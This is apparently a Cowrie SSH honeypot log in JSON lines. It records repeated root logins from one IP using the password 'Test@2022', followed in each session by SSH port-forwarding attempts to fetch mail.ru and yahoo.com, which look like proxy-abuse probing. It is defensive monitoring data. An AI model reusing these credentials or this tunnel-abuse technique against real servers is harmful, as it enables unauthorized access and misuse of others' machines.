{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:55.866837Z","src_ip":"77.83.207.83","session":"c082b9c516f0"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:55.917819Z","src_ip":"77.83.207.83","session":"c082b9c516f0"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":46599,"dst_ip":"1.2.3.4","dst_port":22,"session":"d029c6c2124b","protocol":"ssh","message":"New connection: 77.83.207.83:46599 (1.2.3.4:22) [session: d029c6c2124b]","sensor":"my-vps","timestamp":"2025-08-31T03:53:55.966437Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:55.967336Z","src_ip":"77.83.207.83","session":"d029c6c2124b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:56.017575Z","src_ip":"77.83.207.83","session":"d029c6c2124b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:56.268204Z","src_ip":"77.83.207.83","session":"d029c6c2124b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":24589,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:24589","sensor":"my-vps","timestamp":"2025-08-31T03:53:56.320080Z","session":"d029c6c2124b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:56.370579Z","src_ip":"77.83.207.83","session":"d029c6c2124b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":12903,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:12903","sensor":"my-vps","timestamp":"2025-08-31T03:53:56.512610Z","session":"d029c6c2124b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:56.562865Z","src_ip":"77.83.207.83","session":"d029c6c2124b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":7632,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:7632","sensor":"my-vps","timestamp":"2025-08-31T03:53:56.704582Z","session":"d029c6c2124b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:56.755079Z","src_ip":"77.83.207.83","session":"d029c6c2124b"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:56.806189Z","src_ip":"77.83.207.83","session":"d029c6c2124b"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":46701,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c798a674f06","protocol":"ssh","message":"New connection: 77.83.207.83:46701 (1.2.3.4:22) [session: 5c798a674f06]","sensor":"my-vps","timestamp":"2025-08-31T03:53:56.857133Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:56.858082Z","src_ip":"77.83.207.83","session":"5c798a674f06"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:56.910344Z","src_ip":"77.83.207.83","session":"5c798a674f06"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:57.169407Z","src_ip":"77.83.207.83","session":"5c798a674f06"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":8574,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:8574","sensor":"my-vps","timestamp":"2025-08-31T03:53:57.222499Z","session":"5c798a674f06"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:57.275350Z","src_ip":"77.83.207.83","session":"5c798a674f06"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":4099,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:4099","sensor":"my-vps","timestamp":"2025-08-31T03:53:57.422372Z","session":"5c798a674f06"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:57.474325Z","src_ip":"77.83.207.83","session":"5c798a674f06"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":6109,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:6109","sensor":"my-vps","timestamp":"2025-08-31T03:53:57.622251Z","session":"5c798a674f06"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:57.674471Z","src_ip":"77.83.207.83","session":"5c798a674f06"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:57.727879Z","src_ip":"77.83.207.83","session":"5c798a674f06"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":46791,"dst_ip":"1.2.3.4","dst_port":22,"session":"286e65bad260","protocol":"ssh","message":"New connection: 77.83.207.83:46791 (1.2.3.4:22) [session: 286e65bad260]","sensor":"my-vps","timestamp":"2025-08-31T03:53:57.776577Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:57.777549Z","src_ip":"77.83.207.83","session":"286e65bad260"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:57.827595Z","src_ip":"77.83.207.83","session":"286e65bad260"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:58.076564Z","src_ip":"77.83.207.83","session":"286e65bad260"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":32094,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:32094","sensor":"my-vps","timestamp":"2025-08-31T03:53:58.128770Z","session":"286e65bad260"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:58.178745Z","src_ip":"77.83.207.83","session":"286e65bad260"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":30982,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:30982","sensor":"my-vps","timestamp":"2025-08-31T03:53:58.320197Z","session":"286e65bad260"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:58.370179Z","src_ip":"77.83.207.83","session":"286e65bad260"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":1418,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:1418","sensor":"my-vps","timestamp":"2025-08-31T03:53:58.512159Z","session":"286e65bad260"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:58.562086Z","src_ip":"77.83.207.83","session":"286e65bad260"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:58.612761Z","src_ip":"77.83.207.83","session":"286e65bad260"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":46898,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1168a174501","protocol":"ssh","message":"New connection: 77.83.207.83:46898 (1.2.3.4:22) [session: c1168a174501]","sensor":"my-vps","timestamp":"2025-08-31T03:53:58.662168Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:58.663382Z","src_ip":"77.83.207.83","session":"c1168a174501"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:58.713457Z","src_ip":"77.83.207.83","session":"c1168a174501"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:58.963010Z","src_ip":"77.83.207.83","session":"c1168a174501"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":784,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:784","sensor":"my-vps","timestamp":"2025-08-31T03:53:59.014112Z","session":"c1168a174501"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:59.064271Z","src_ip":"77.83.207.83","session":"c1168a174501"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":376,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:376","sensor":"my-vps","timestamp":"2025-08-31T03:53:59.204884Z","session":"c1168a174501"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:59.255228Z","src_ip":"77.83.207.83","session":"c1168a174501"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":20893,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:20893","sensor":"my-vps","timestamp":"2025-08-31T03:53:59.396368Z","session":"c1168a174501"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:59.446325Z","src_ip":"77.83.207.83","session":"c1168a174501"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:59.496835Z","src_ip":"77.83.207.83","session":"c1168a174501"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":47014,"dst_ip":"1.2.3.4","dst_port":22,"session":"76ff93bc32a1","protocol":"ssh","message":"New connection: 77.83.207.83:47014 (1.2.3.4:22) [session: 76ff93bc32a1]","sensor":"my-vps","timestamp":"2025-08-31T03:53:59.546568Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:59.547475Z","src_ip":"77.83.207.83","session":"76ff93bc32a1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:59.597849Z","src_ip":"77.83.207.83","session":"76ff93bc32a1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:59.849519Z","src_ip":"77.83.207.83","session":"76ff93bc32a1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":15863,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:15863","sensor":"my-vps","timestamp":"2025-08-31T03:53:59.901649Z","session":"76ff93bc32a1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:59.952436Z","src_ip":"77.83.207.83","session":"76ff93bc32a1"}
